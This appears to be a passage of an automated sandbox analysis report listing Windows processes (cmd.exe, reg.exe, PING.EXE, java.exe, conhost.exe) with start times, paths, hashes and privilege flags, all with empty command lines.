Start time: | 01:00:23 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc70000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 18 |
Start time: | 01:00:23 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 19 |
Start time: | 01:00:23 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\reg.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xb50000 |
File size: | 59'392 bytes |
MD5 hash: | CDD462E86EC0F20DE2A1D781928B1B0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 20 |
Start time: | 01:00:23 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\PING.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x900000 |
File size: | 18'944 bytes |
MD5 hash: | B3624DD758CCECF93A1226CEF252CA12 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 23 |
Start time: | 01:01:57 |
Start date: | 04/04/2025 |
Path: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 257'664 bytes |
MD5 hash: | 9DAA53BAB2ECB33DC0D9CA51552701FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 24 |
Start time: | 01:01:57 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 25 |
Start time: | 01:01:57 |
Start date: | 04/04/2025 |
Path: | C:\Program Files (x86)\Java\jre-1.8\bin\java.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 257'664 bytes |
MD5 hash: | 9DAA53BAB2ECB33DC0D9CA51552701FA |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Has exited: | true |
Target ID: | 26 |
Start time: | 01:01:57 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 27 |
Start time: | 01:01:58 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc70000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 28 |
Start time: | 01:01:58 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 29 |
Start time: | 01:01:58 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\PING.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x900000 |
File size: | 18'944 bytes |
MD5 hash: | B3624DD758CCECF93A1226CEF252CA12 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 30 |
Start time: | 01:01:58 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xc70000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 31 |
Start time: | 01:01:58 |
Start date: | 04/04/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff62fc20000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |
Target ID: | 32 |
Start time: | 01:01:58 |
Start date: | 04/04/2025 |
Path: | C:\Windows\SysWOW64\PING.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x900000 |
File size: | 18'944 bytes |
MD5 hash: | B3624DD758CCECF93A1226CEF252CA12 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Has exited: | true |